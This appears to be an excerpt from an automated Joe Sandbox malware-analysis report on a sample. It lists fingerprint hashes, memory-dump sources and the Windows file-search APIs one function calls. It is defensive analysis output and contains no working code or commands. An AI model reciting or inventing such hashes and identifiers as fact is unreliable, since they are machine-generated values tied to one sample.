                                                                                                • Instruction Fuzzy Hash: C011B271A05306BBDB048F19C884B8ABBF8EB89364F00852DFA54D3750E7B2D9008BD2
                                                                                                APIs
                                                                                                • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413B85
                                                                                                • StrCmpCA.SHLWAPI(?,00420F58), ref: 00413B97
                                                                                                • StrCmpCA.SHLWAPI(?,00420F5C), ref: 00413BAD
                                                                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00413EB7
                                                                                                • FindClose.KERNEL32(000000FF), ref: 00413ECC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$CloseFileNextlstrcat
                                                                                                • String ID: q?A
                                                                                                • API String ID: 3840410801-4084695119
                                                                                                • Opcode ID: 0e70d8f007815c078199d768b3eb50a19077b8f7193eafda07f08b5b77a90090
                                                                                                • Instruction ID: 435e47d99a68a60cc5746cb21b8f71e50488397b794716e085ba6dfc691b5c27
                                                                                                • Opcode Fuzzy Hash: 0e70d8f007815c078199d768b3eb50a19077b8f7193eafda07f08b5b77a90090
                                                                                                • Instruction Fuzzy Hash: B3D05B7190411D5BCB10EF64DD489EA7378EB55705F0041CAF40E97150FB349F858F55